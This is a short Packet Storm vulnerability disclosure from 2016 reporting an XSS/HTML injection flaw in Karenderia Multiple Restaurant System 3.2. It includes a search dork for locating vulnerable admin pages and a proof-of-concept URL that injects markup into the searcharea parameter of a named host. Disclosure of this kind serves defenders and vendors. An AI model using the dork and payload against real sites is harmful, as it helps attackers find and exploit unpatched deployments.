Karenderia Multiple Restaurant System 3.2 Cross Site Scripting

2016-08-20T00:00:00
ID PACKETSTORM:138452
Type packetstorm
Reporter indoushka
Modified 2016-08-20T00:00:00

Description

                                        
                                            `========================================================================  
| # Title : Karenderia Multiple Restaurant System 3.2 Xss/html inject vulnerability  
| # Author : indoushka  
| # email : indoushka4ever@gmail.com  
| # Tested on : windows 8.1 FranASSais V.(Pro)  
| # Version : v 3.2  
| # Vendor : http://dl.persianscript.ir/script/karenderia-multiple-restaurant-system3.2%28PersianScript.ir%29.zip  
========================================================================  
  
Dork : ">restomulti - Login Admin"  
  
poc :  
  
http://kazresto.re/restomulti/store/searcharea?s=%3Cmarquee%3E%3Cfont+color%3Dlime+size%3D32%3Eindoushka%3C%2Ffont%3E%3C%2Fmarquee%3E  
  
  
  
  
Greetz :   
jericho http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com * Larry W. Cashdollar*  
Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be *  
---------------------------------------------------------------------------------------------------------------  
`